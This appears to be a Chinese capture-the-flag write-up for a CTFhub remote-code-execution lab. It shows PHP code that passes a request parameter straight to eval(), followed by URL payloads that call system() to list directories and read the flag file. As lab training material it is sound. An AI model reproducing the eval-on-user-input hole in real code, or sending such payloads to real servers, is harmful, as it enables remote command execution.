CTFhub-RCE-evel执行

访问目标地址:

<?php

if (isset($_REQUEST['cmd'])) {

eval($_REQUEST["cmd"]);

} else {

highlight_file(FILE);

}

?>

根据PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");
!切记最后的分号不可省略!

没有需要的文件

看看上一级的文件夹 /?cmd=system("ls /");
!切记最后的分号不可省略!

打开flag文件发现FLAG /?cmd=system("cat /flag_8668");
!切记最后的分号不可省略!

相关推荐
JosieBook20 小时前
【Vue】12 Vue技术—— Vue 事件修饰符详解:掌握事件处理的高级技巧
前端·javascript·vue.js
未若君雅裁20 小时前
SpringAI基础入门
java·spring boot·ai
CC.GG20 小时前
【C++】用哈希表封装myunordered_map和 myunordered_set
java·c++·散列表
a努力。21 小时前
字节Java面试被问:TCP的BBR拥塞控制算法原理
java·开发语言·python·tcp/ip·elasticsearch·面试·职场和发展
艾斯特_21 小时前
Echarts常用配置项及解释
前端·javascript·echarts
jiaguangqingpanda21 小时前
Day24-20260120
java·开发语言·数据结构
m0_5027249521 小时前
飞书真机调试
开发语言·前端·javascript
一个龙的传说21 小时前
xshell下载
java
C雨后彩虹21 小时前
羊、狼、农夫过河
java·数据结构·算法·华为·面试
java资料站1 天前
SpringAI+DeepSeek大模型应用开发实战
java